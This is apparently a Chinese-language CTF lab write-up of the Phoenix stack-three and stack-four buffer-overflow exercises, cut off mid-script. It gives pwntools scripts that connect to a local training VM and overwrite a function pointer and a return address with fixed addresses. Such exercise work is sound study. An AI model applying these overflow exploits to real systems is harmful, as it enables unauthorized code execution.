最近又是数模又是开学的,很难受,还是看看远方的水入门题吧。没有动态基址,还是比较简单的。 (写这段的时候还没想到接下来还有概率论考试,还打了场ctf校赛,所以。。。)stack-three覆盖一个即将被调用的函数指针的数据,跟前面差不多。from pwn import * shell = ssh("user", "localhost", password="user", port=2222) s = b"a" * 0x40 + p64(0x40069d) sh = shell.run(b"/opt/phoenix/amd64/stack-three") sh.recvlines(1) sh.sendline(s) print(sh.recvlines(2)) stack-four覆盖栈上的返回地址。notion image0x648-0x5f0=88from pwn import * shell = ssh("user", "localhost", password="user", port=2222) s = b"a" * 88 + p64(0x40061d) sh = she...